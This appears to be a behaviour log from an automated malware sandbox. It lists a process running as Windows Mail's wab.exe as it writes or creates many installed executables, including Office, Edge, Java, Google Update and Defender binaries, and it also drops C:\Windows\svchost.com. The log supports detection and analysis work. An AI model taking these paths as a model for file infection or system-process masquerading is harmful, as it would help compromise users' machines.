Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
